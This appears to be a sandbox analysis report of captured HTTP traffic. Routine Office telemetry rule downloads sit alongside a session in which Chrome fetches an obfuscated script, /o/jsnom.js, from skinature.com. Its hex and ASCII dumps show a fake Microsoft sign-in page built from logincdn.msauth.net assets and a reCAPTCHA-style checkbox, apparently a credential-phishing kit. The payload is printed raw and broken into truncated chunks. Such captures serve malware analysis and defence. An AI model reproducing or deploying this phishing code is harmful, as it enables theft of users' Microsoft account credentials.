                                                                    2024-10-28 13:03:18 UTC8000INData Raw: 64 65 42 61 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                    Data Ascii: deBar\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\
                                                                    2024-10-28 13:03:18 UTC8000INData Raw: 32 32 62 61 63 6b 41 72 72 6f 77 5c 78 32 32 5c 78 32 30 72 6f 6c 65 3d 5c 78 32 32 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 78 32 32 5c 78 32 30 70 6e 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33
                                                                    Data Ascii: 22backArrow\x22\x20role=\x22presentation\x22\x20pngsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3
                                                                    2024-10-28 13:03:18 UTC8000INData Raw: 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32
                                                                    Data Ascii: cf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x2
                                                                    2024-10-28 13:03:18 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c
                                                                    Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20\x20...\x20<input\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    10192.168.2.44975613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:19 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:19 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:19 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 3788
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                    ETag: "0x8DC582BAC2126A6"
                                                                    x-ms-request-id: 041e76a7-601e-005c-45ae-26f06f000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130319Z-16849878b7898p5f6vryaqvp5800000005y0000000007876
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:19 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    11192.168.2.44975813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:19 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:19 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:19 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 2980
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                    ETag: "0x8DC582BA80D96A1"
                                                                    x-ms-request-id: 834668b8-301e-0052-121c-2765d6000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130319Z-15b8d89586f989rkfw99rwd68g0000000670000000009n1r
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:19 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    12192.168.2.44975913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:19 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:19 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:19 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 2160
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                    ETag: "0x8DC582BA3B95D81"
                                                                    x-ms-request-id: 87a1057c-b01e-0002-4e36-281b8f000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130319Z-17c5cb586f626sn8grcgm1gf8000000003ng0000000015rd
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:19 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    13192.168.2.44976013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:19 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:19 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:19 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 408
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                    ETag: "0x8DC582BB56D3AFB"
                                                                    x-ms-request-id: 11ae3112-301e-005d-596b-27e448000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130319Z-16849878b78zqkvcwgr6h55x9n00000004hg000000007wyt
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:19 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    14192.168.2.44975713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:19 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:19 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:19 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 450
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                    ETag: "0x8DC582BD4C869AE"
                                                                    x-ms-request-id: 9a0790d9-e01e-0052-7cad-26d9df000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130319Z-16849878b7867ttgfbpnfxt44s00000004yg000000008u45
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:19 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.44976150.87.179.2404431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:19 UTC347OUTGET /o/jsnom.js HTTP/1.1
                                                                    Host: skinature.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:19 UTC313INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:19 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Last-Modified: Thu, 24 Oct 2024 17:05:19 GMT
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 100217
                                                                    Vary: Accept-Encoding
                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                    Content-Type: application/javascript
                                                                    2024-10-28 13:03:19 UTC7879INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                                                    Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                                                    2024-10-28 13:03:19 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 70 6f 73 69 74 69 6f 6e 3a 5c 78 32 30 61 62 73 6f 6c 75 74 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78
                                                                    Data Ascii: 20\x20\x20position:\x20absolute;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x
                                                                    2024-10-28 13:03:19 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30
                                                                    Data Ascii: 20\x20\x20\x20\x20letter-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20
                                                                    2024-10-28 13:03:19 UTC8000INData Raw: 64 65 42 61 72 5c 78 32 30 7b 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78
                                                                    Data Ascii: deBar\x20{}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x
                                                                    2024-10-28 13:03:20 UTC8000INData Raw: 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                    Data Ascii: ng-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x2
